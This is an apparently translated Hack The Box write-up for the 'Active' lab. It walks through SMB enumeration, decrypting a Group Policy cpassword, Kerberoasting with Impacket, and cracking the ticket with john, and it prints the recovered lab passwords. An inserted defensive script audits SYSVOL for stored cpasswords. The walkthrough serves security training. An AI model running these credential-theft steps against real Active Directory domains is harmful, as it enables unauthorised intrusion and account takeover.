Basic information

Hack The Box is an online penetration testing platform that helps you improve your penetration testing and black-box testing skills. Its environments simulate real ones, which helps you adapt to penetration testing in real environments. Link: www.hackthebox.eu/home/machin…

Note: without network security there is no national security. To strengthen protection against computer intrusion, all activity here is carried out with the platform's authorization. I will use Kali Linux as the attacker machine to tackle this HTB. The techniques used here are for educational purposes only, and no responsibility is taken if they are used for any other purpose.

I. Information collection

1. IP of the target machine

Based on the basic information, the IP address of the target machine is 10.10.10.100

2. Open ports and services

nmap -sS -sV -A -O 10.10.10.100 -o xb.log

The Nmap scan shows that the target runs the AD domain active.htb and has the SMB service open

II. Vulnerability detection and exploitation

Enumerate the SMB shares with smbmap to see whether they expose any useful information

smbmap -H 10.10.10.100

The Replication share turns out to be accessible

smbclient //10.10.10.100/Replication

Log in anonymously to the Replication share using smbclient

Find Groups.xml in \active.htb\Policies\{31b2f340-016D-11d2-945F-00c04fb984f9}\MACHINE\Preferences\Groups\

Download the file locally for viewing

It contains a user name and a password

The cpassword value is a Group Policy password that can be decrypted with the gpp-decrypt tool provided by Kali

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

This yields the plaintext password: GPPstillStandingStrong2k18
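The decryption above works because every cpassword is encrypted with one AES key that Microsoft published, so any account that can read SYSVOL can recover it. As an added example (not part of the original write-up), a defender can audit a copy of SYSVOL for the same weakness: the script walks a directory tree and reports each preference file that still stores a non-empty cpassword, without decrypting it. The sample files, the EXAMPLE domain, the account names and the list of account attribute names are assumptions made for the example.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Attributes that name the account in the different GPP preference files
# (assumed set: Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml).
ACCOUNT_ATTRS = ("username", "accountname", "runas")

def find_cpasswords(root):
    """Return sorted (relative path, account) pairs for each non-empty cpassword under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except (ET.ParseError, OSError):
                continue  # malformed or unreadable file: nothing to report
            for elem in tree.iter():
                attrs = {k.lower(): v for k, v in elem.attrib.items()}
                if attrs.get("cpassword"):  # cpassword="" means no stored secret
                    account = next((attrs[a] for a in ACCOUNT_ATTRS if attrs.get(a)), "?")
                    findings.append((os.path.relpath(path, root), account))
    return sorted(findings)

# Constructed sample files; the cpassword value is a placeholder, not a real blob.
SAMPLE = {
    "Policies/{GUID-A}/MACHINE/Preferences/Groups/Groups.xml":
        '<Groups><User name="EXAMPLE\\svc_demo"><Properties action="U" '
        'cpassword="PLACEHOLDER" userName="EXAMPLE\\svc_demo"/></User></Groups>',
    "Policies/{GUID-B}/MACHINE/Preferences/Groups/Groups.xml":
        '<Groups><User name="local_admin"><Properties action="U" '
        'cpassword="" userName="local_admin"/></User></Groups>',
    "Policies/{GUID-B}/MACHINE/Registry.xml": "<broken",
}

def scan_sample():
    """Write SAMPLE into a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLE.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return find_cpasswords(root)

if __name__ == "__main__":
    for rel, account in scan_sample():
        print(f"cpassword stored for {account} in {rel}")
```

Any hit should be removed from the policy and the account's password changed: the MS14-025 update stops new cpassword entries from being created but does not delete existing ones.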

Log in as user SVC_TGS using smbclient

smbclient //10.10.10.100/Users -U SVC_TGS

user.txt was found under user SVC_TGS

Download it to the local machine for viewing

Got user.txt

III. Privilege escalation

After collecting this user's information, I found nothing that could be used. When I looked back at the Nmap scan results, I found that port 88 was open, running the Kerberos service

Kerberos credentials for Administrator can be obtained using GetUserSPNs.py from Impacket

Impacket link: Github.com/SecureAuthC…

After obtaining the ticket, use John to crack it and obtain the plaintext password

vim pass.txt
john pass.txt --wordlist=/usr/share/wordlists/rockyou.txt

Use this password to log in: Ticketmaster1968

smbclient -U administrator //10.10.10.100/Users

Got root.txt